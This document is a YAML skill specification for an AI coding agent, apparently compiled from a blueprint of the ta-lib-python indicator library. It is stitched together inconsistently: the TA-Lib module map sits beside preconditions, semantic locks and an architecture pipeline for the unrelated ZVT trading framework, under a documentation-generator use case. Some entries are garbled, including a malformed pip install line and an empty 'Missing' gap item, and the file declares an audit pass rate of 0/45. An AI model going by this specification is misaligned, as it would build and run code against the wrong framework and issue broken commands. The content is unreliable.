  - markdown to html
  - code highlighting
  stage: reporting
  data_domain: mixed
  type: reporting
component_capability_map:
  project: finance-bp-109--ta-lib-python
  scan_date: '2026-04-22'
  stats:
    total_files: 6
    total_classes: 23
    total_functions: 0
    total_stages: 6
  modules:
    c_library_binding_layer:
      class_count: 2
      stage_id: c_wrapper
      stage_order: 1
      responsibility: 'Provides low-level Cython bindings to the underlying TA-Lib C library with function signatures auto-generated
        from ta_func.h header files. WHY: Avoids SWIG overhead for 2-4x performance improvement over original Python bindings.'
      classes:
      - name: TA_RetCode enum access
        file: c_library_binding_layer/ta-retcode-enum-access.py
        line: 0
        kind: required_method
        signature: ''
      - name: Array validation
        file: c_library_binding_layer/array-validation.py
        line: 0
        kind: replaceable_point
      design_decision_count: 4
    function_api_(batch):
      class_count: 4
      stage_id: func_api
      stage_order: 2
      responsibility: 'Provides stateless, direct function calls for batch processing entire indicator over input arrays.
        WHY: Simple API for一次性 computation without state management, suitable for backtesting and batch analysis.'
      classes:
      - name: SMA.compute
        file: function_api_(batch)/sma-compute.py
        line: 0
        kind: required_method
        signature: ''
      - name: BBANDS.compute
        file: function_api_(batch)/bbands-compute.py
        line: 0
        kind: required_method
        signature: ''
      - name: ADX.compute
        file: function_api_(batch)/adx-compute.py
        line: 0
        kind: required_method
        signature: ''
      - name: Lookback padding
        file: function_api_(batch)/lookback-padding.py
        line: 0
        kind: replaceable_point
      design_decision_count: 4
    stream_api_(incremental):
      class_count: 4
      stage_id: stream_api
      stage_order: 3
      responsibility: 'Provides streaming functions that return single scalar values for real-time/online computation. WHY:
        For live trading systems where data arrives incrementally and only latest indicator value matters.'
      classes:
      - name: stream_MOM.execute
        file: stream_api_(incremental)/stream-mom-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: stream_CDL3BLACKCROWS.execute
        file: stream_api_(incremental)/stream-cdl3blackcrows-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: stream_SMA.execute
        file: stream_api_(incremental)/stream-sma-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: Streaming state
        file: stream_api_(incremental)/streaming-state.py
        line: 0
        kind: replaceable_point
      design_decision_count: 3
    abstract_api_(stateful):
      class_count: 7
      stage_id: abstract_api
      stage_order: 4
      responsibility: 'Object-oriented wrapper providing stateful Function instances with unified interface for setting inputs,
        parameters, and retrieving results. WHY: Simplifies complex functions like STOCH with multiple inputs/outputs and
        enables reusable function instances with caching.'
      classes:
      - name: Function.__call__
        file: abstract_api_(stateful)/function-call.py
        line: 0
        kind: required_method
        signature: ''
      - name: Function.set_input_arrays
        file: abstract_api_(stateful)/function-set-input-arrays.py
        line: 0
        kind: required_method
        signature: ''
      - name: SMA.invoke
        file: abstract_api_(stateful)/sma-invoke.py
        line: 0
        kind: required_method
        signature: ''
      - name: BBANDS.invoke
        file: abstract_api_(stateful)/bbands-invoke.py
        line: 0
        kind: required_method
        signature: ''
      - name: STOCH.invoke
        file: abstract_api_(stateful)/stoch-invoke.py
        line: 0
        kind: required_method
        signature: ''
      - name: Input data type
        file: abstract_api_(stateful)/input-data-type.py
        line: 0
        kind: replaceable_point
      - name: Input price series
        file: abstract_api_(stateful)/input-price-series.py
        line: 0
        kind: replaceable_point
      design_decision_count: 6
    series_support_layer:
      class_count: 2
      stage_id: series_wrapper
      stage_order: 5
      responsibility: 'Wraps each public functions to accept pandas/polars Series and return matching types. WHY: Users prefer
        working with labeled Series/DataFrames for financial data; automatic conversion improves usability without sacrificing
        performance.'
      classes:
      - name: _wrapper.decorate
        file: series_support_layer/wrapper-decorate.py
        line: 0
        kind: required_method
        signature: ''
      - name: Series type detection
        file: series_support_layer/series-type-detection.py
        line: 0
        kind: replaceable_point
      design_decision_count: 4
    code_generation:
      class_count: 4
      stage_id: code_generation
      stage_order: 6
      responsibility: 'Generates Cython code for _func.pxi and _stream.pxi from ta_func.h header file. WHY: 150+ functions;
        manual maintenance would be error-prone and tedious; ensures consistency with upstream TA-Lib changes.'
      classes:
      - name: generate_func.execute
        file: code_generation/generate-func-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: generate_stream.execute
        file: code_generation/generate-stream-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: generate_abstract_stub.execute
        file: code_generation/generate-abstract-stub-execute.py
        line: 0
        kind: required_method
        signature: ''
      - name: Name transformation rules
        file: code_generation/name-transformation-rules.py
        line: 0
        kind: replaceable_point
      design_decision_count: 4
  data_flow_hints: []
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: 1.0
    evidence_verify_ratio: 0.45054945054945056
    evidence_invalid: 50
    evidence_verified: 41
    evidence_auto_fixed: 0
    audit_coverage: 45/45 (100%)
    audit_pass_rate: 0/45 (0%)
    audit_fail_total: 35
    audit_finance_universal:
      pass: 0
      warn: 5
      fail: 15
    audit_subdomain_totals:
      pass: 0
      warn: 5
      fail: 20
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-109. Evidence verify ratio
    = 45.1% and audit fail total = 35. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-109-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc:
  - UC-101
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-101
    name: TA-Lib Documentation HTML Generator
    positive_terms:
    - documentation generation
    - html pages
    - pygments stylesheet
    - markdown to html
    - code highlighting
    data_domain: mixed
    negative_terms:
    - trading strategy
    - backtesting
    - factor computation
    - market data
    - stock screening
    - live trading
    ambiguity_question: Are you looking to generate documentation/build pages, or are you trying to implement or analyze trading
      strategies?
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 104
    fatal_constraints_count: 27
    non_fatal_constraints_count: 147
    use_cases_count: 1
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 30 source groups: abstract_api(5),
        architecture(1), c_wrapper(6), calculation(1), code_generation(3), compatibility(1), and 24 more.'
      key_decisions: 104 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-010
      type: B
      summary: Thread-local storage per Function instance
    - id: BD-011
      type: B
      summary: Output caching via outputs_valid dirty flag
    - id: BD-012
      type: B/BA
      summary: Price series default mapping via __INPUT_PRICE_SERIES_DEFAULTS
    - id: BD-013
      type: BA
      summary: Subclassable set_input_arrays for custom data types
    - id: BD-014
      type: B
      summary: Parameter validation with explicit type checking
    - id: BD-022
      type: B
      summary: Use Cython instead of SWIG for Python bindings to TA-Lib C library
    - id: BD-001
      type: B
      summary: Cython chosen over SWIG for Python bindings
    - id: BD-002
      type: B
      summary: Array type validation at API boundary
    - id: BD-003
      type: B/BA
      summary: Integer default sentinel maps to TA_INTEGER_DEFAULT (-2^31)
    - id: BD-004
      type: BA
      summary: Auto-generated Python bindings from ta_func.h header
    - id: BD-GAP-001
      type: B
      summary: 'Missing: /N/A:** 15 ()'
    - id: BD-GAP-002
      type: RC
      summary: 'Missing: Add precision limitations section to README documenting that each calculations use float64 (C double)
        and are unsuitable for fixed income pricing, currency handling, or any use case requiring'
    - id: BD-054
      type: B
      summary: Return lookback = timeperiod-1 for SMA, computed dynamically per parameters
    - id: BD-019
      type: BA
      summary: Build-time C header parsing for code generation
    - id: BD-020
      type: B/BA
      summary: Pythonic name transformation for C parameter names
    - id: BD-021
      type: B
      summary: Filter non-indicator functions from code generation
    - id: BD-051
      type: B/RC
      summary: Use Python 2/3 compatible exception handling for optional imports
    - id: BD-029
      type: B/BA
      summary: Provide set_unstable_period() to configure convergence behavior of adaptive indicators
    - id: BD-030
      type: B
      summary: Provide set_compatibility() to match other TA library behaviors (0=TA-Lib, 1=S&A)
    - id: BD-044
      type: B/BA
      summary: Support candle settings customization for pattern recognition
    - id: BD-080
      type: BA
      summary: Default price series mapping hardcodes 'close' as default for each price-based functions
    - id: BD-085
      type: DK/B
      summary: Lookback period pre-filled with NaN values in output arrays before calculation
    - id: BD-087
      type: BA
      summary: Input array length equality enforced before any calculation via check_length* functions
    - id: BD-088
      type: DK
      summary: Function name normalization to uppercase - 'sma' and 'SMA' both work identically
    - id: BD-092
      type: BA
      summary: 'Double-precision enforcement: input arrays must be NPY_DOUBLE type and C-contiguous'
    - id: BD-040
      type: B/BA
      summary: Default price input for single-price functions is 'close' series
    - id: BD-046
      type: B/BA
      summary: Define default timeperiod=14 for RSI, timeperiod=30 for many MAs
    - id: BD-005
      type: B
      summary: NaN padding for lookback period in batch functions
    - id: BD-006
      type: B/BA
      summary: 'Index convention: endIdx as length-1 (zero-based last element)'
    - id: BD-007
      type: B/BA
      summary: No implicit input defaults - each price arrays required
    - id: BD-032
      type: B
      summary: Provide both Function API (stateless) and Abstract API (stateful) interfaces
    - id: BD-042
      type: B/BA
      summary: Define function name lookup as case-insensitive (uppercase internally)
    - id: BD-048
      type: B/BA
      summary: Allow setting input price series via price='open' kwarg in Abstract API
    - id: BD-028
      type: B
      summary: Define 9 moving average types (SMA, EMA, WMA, DEMA, TEMA, TRIMA, KAMA, MAMA, T3)
    - id: BD-035
      type: B
      summary: Provide streaming versions (stream_*) of each 161 functions for incremental processing
    - id: BD-038
      type: B/RC
      summary: Implement 61 candlestick pattern recognition functions (CDL*)
    - id: BD-052
      type: B
      summary: Support variable period MAVP function with minperiod/maxperiod bounds
    - id: BD-095
      type: B/BA
      summary: 'INTERACTION: BD-010 (Thread-local storage) × BD-074 (Deep copy for thread safety) → Thread safety strategy
        contradiction'
    - id: BD-096
      type: BA
      summary: 'INTERACTION: BD-091 (Generated code from C headers) × BD-004 (Auto-generated Python bindings) × BD-019 (Build-time
        C header parsing) → Risk cascade on build pipeline'
    - id: BD-097
      type: B
      summary: 'INTERACTION: BD-092 (NPY_DOUBLE and C-contiguous requirement) × BD-015 (Lazy dependency detection) → Performance
        risk in DataFrame path'
    - id: BD-098
      type: BA
      summary: 'INTERACTION: BD-085 (NaN pre-fill for lookback) × BD-090 (NaN propagation differs from pandas) → Behavioral
        surprise risk cascade'
    - id: BD-099
      type: B/BA
      summary: 'INTERACTION: BD-081 (Import-time singleton init) × BD-093 (Unstable period ordering) × BD-029 (set_unstable_period)
        → Hidden state dependency in configuration'
    - id: BD-100
      type: B/BA
      summary: 'INTERACTION: BD-087 (Array length validation) × BD-084 (Output type preservation) → Validation failure prevents
        type preservation'
    - id: BD-101
      type: B
      summary: 'INTERACTION: BD-016 (Polars/pandas mutual exclusion) × BD-037 (Raise exception on mixing) → Confirmed redundant
        constraint with ambiguous scope'
    - id: BD-102
      type: BA/DK
      summary: 'INTERACTION: BD-054 (Dynamic lookback computation) × BD-006 (endIdx as length-1 convention) → Risk cascade
        on index boundary calculations'
    - id: BD-043
      type: B/BA
      summary: Use make_double_array() to pre-fill output arrays with NaN up to lookback
    - id: BD-089
      type: DK/B
      summary: MA_Type implemented as singleton class instance not Python Enum
    - id: BD-024
      type: B
      summary: Wrap each TA-Lib functions to support pandas.Series and polars.Series input
    - id: BD-025
      type: B
      summary: Convert each input data to float64 numpy arrays before calling C functions
    - id: BD-055
      type: B
      summary: Support pandas.DataFrame column access by name in Abstract API
    - id: BD-081
      type: RC
      summary: Import-time singleton initialization with atexit shutdown required before any function calls
    - id: BD-083
      type: T
      summary: Polars and Pandas cannot be mixed - mutual exclusion enforced at runtime
    - id: BD-090
      type: BA
      summary: NaN handling propagates to end of output in TA-Lib (different from pandas rolling)
    - id: BD-023
      type: B/BA
      summary: Initialize TA-Lib on module import and register shutdown on process exit
    - id: BD-049
      type: B
      summary: Use @wraps decorator on wrapper to preserve function metadata
    - id: BD-056
      type: B
      summary: Define TA_FUNC_FLAGS including 'Function has an unstable period'
    - id: BD-039
      type: B
      summary: Use int32 for integer outputs (patterns, indices) to reduce memory
    - id: BD-086
      type: B/BA
      summary: Parameter state restoration after __call__ ensures no permanent state change per invocation
    - id: BD-093
      type: T
      summary: Unstable period setting must precede indicator calculation for effect
    - id: BD-031
      type: B/RC
      summary: 'Organize 161 functions into 10 groups: Overlap, Momentum, Volume, Volatility, Pattern, etc.'
    - id: BD-026
      type: B/BA
      summary: Return Series/DataFrame when input is Series/DataFrame (preserve type)
    - id: BD-027
      type: B/BA
      summary: Use NaN to fill lookback period in output arrays
    - id: BD-034
      type: B/BA
      summary: Store lookback period NaN values as 0 in integer output arrays
    - id: BD-041
      type: B/RC
      summary: Preserve pandas index when converting back to Series output
    - id: BD-050
      type: B
      summary: Check for streaming result by testing if first result lacks __len__
    - id: BD-082
      type: B
      summary: Thread-local storage used in Abstract Function for per-thread state isolation
    - id: BD-084
      type: BA
      summary: 'Output type preservation pattern: DataFrame→DataFrame, Series→Series, ndarray→ndarray'
    - id: BD-091
      type: T
      summary: 'Generated code pattern: _func.pxi and _stream.pxi auto-generated from C headers'
    - id: BD-015
      type: BA
      summary: Lazy optional dependency detection for pandas and polars
    - id: BD-016
      type: B
      summary: 'Mutual exclusion: cannot mix polars and pandas in single call'
    - id: BD-017
      type: B/DK
      summary: Preserve pandas index through computation
    - id: BD-018
      type: B
      summary: Identity passthrough wrapper when no pandas/polars available
    - id: BD-008
      type: B
      summary: Single scalar output for stream/incremental processing
    - id: BD-009
      type: BA
      summary: Unified function signatures between batch and stream APIs
    - id: BD-094
      type: T
      summary: tools/generate_abstract_stub.py creates type stubs using runtime introspection
    - id: BD-057
      type: B
      summary: Float64 conversion for pandas/polars Series before calling C library
    - id: BD-058
      type: B/BA
      summary: Default SMA parameters for Stochastic Oscillator slowK
    - id: BD-059
      type: B/BA
      summary: Default SMA parameters for Stochastic Oscillator slowD
    - id: BD-060
      type: B/BA
      summary: EMA-based Bollinger Bands parameters
    - id: BD-061
      type: B/BA
      summary: Default RSI timeperiod for Stochastic RSI info
    - id: BD-062
      type: B
      summary: MAVP variable period range configuration
    - id: BD-063
      type: B/BA
      summary: Default SMA timeperiod for MAVP min/max bounds
    - id: BD-064
      type: B/DK
      summary: MIN/MAX sliding window timeperiod
    - id: BD-065
      type: B/DK
      summary: Momentum timeperiod for rate-of-change calculation
    - id: BD-066
      type: B
      summary: EMA smoothing parameters for STOCHRSI fastD
    - id: BD-067
      type: B/BA
      summary: STOCHRSI default parameters for RSI and Stochastic
    - id: BD-068
      type: B/DK
      summary: EMA timeperiod for double smoothing test
    - id: BD-069
      type: B
      summary: RSI Wilder smoothing timeperiod
    - id: BD-070
      type: B/BA
      summary: Set compatibility mode to 0 (default) vs 1
    - id: BD-071
      type: B
      summary: Set unstable period for EMA convergence
    - id: BD-072
      type: B/DK
      summary: TEMA triple exponential smoothing timeperiod
    - id: BD-073
      type: B/DK
      summary: ATR true range calculation timeperiod
    - id: BD-074
      type: B
      summary: Deep copy for thread-safe data manipulation
    - id: BD-075
      type: B/BA
      summary: BBANDS default Bollinger Bands parameters
    - id: BD-076
      type: B/BA
      summary: Candlestick CDL3BLACKCROWS pattern detection
    - id: BD-077
      type: B/DK
      summary: MAXINDEX rolling maximum position index
    - id: BD-078
      type: B/BA
      summary: Expected number of TA-Lib functions
    - id: BD-079
      type: B
      summary: NaN propagation for missing values
    - id: BD-045
      type: B
      summary: Test with Ford Motor Company 2012 stock data as fixture
    - id: BD-033
      type: B
      summary: Use threading.local() for per-thread state in Abstract Function class
    - id: BD-053
      type: B
      summary: Allow concurrent thread access via thread-local storage in Abstract API
    - id: BD-036
      type: B
      summary: Validate input arrays are float64 type and C-contiguous before processing
    - id: BD-037
      type: B
      summary: Raise exception when mixing polars and pandas inputs
    - id: BD-047
      type: B
      summary: Raise TypeError for invalid parameter types (float for int parameter)
resources:
  packages:
  - name: numpy
    version_pin: latest
  - name: TA-Lib C library (libta-lib / ta-lib-static)
    version_pin: latest
  - name: Cython
    version_pin: latest
  - name: build
    version_pin: latest
  - name: pandas
    version_pin: latest
  - name: polars
    version_pin: latest
  - name: pytest
    version_pin: latest
  - name: setuptools
    version_pin: latest
  - name: wheel
    version_pin: latest
  - name: cibuildwheel
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install numpy
    - python3 -m pip install TA-Lib C library (libta-lib / ta-lib-static)
    - python3 -m pip install Cython
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: finance-C-001
    when: When calling check_array on input numpy arrays before C function invocation
    action: validate array dtype is NPY_DOUBLE (float64) and raise Exception for non-double arrays
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Passing non-float64 arrays to TA-Lib C functions causes memory corruption or incorrect calculations due to
      type mismatch in the C FFI layer
    stage_ids:
    - c_wrapper
  - id: finance-C-002
    when: When validating input array dimensions before C function calls
    action: enforce input arrays have exactly 1 dimension (ndim == 1)
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Multidimensional arrays passed to TA-Lib C functions cause memory access violations and segmentation faults
      due to incorrect stride calculations
    stage_ids:
    - c_wrapper
  - id: finance-C-003
    when: When checking TA_RetCode return values from C function calls
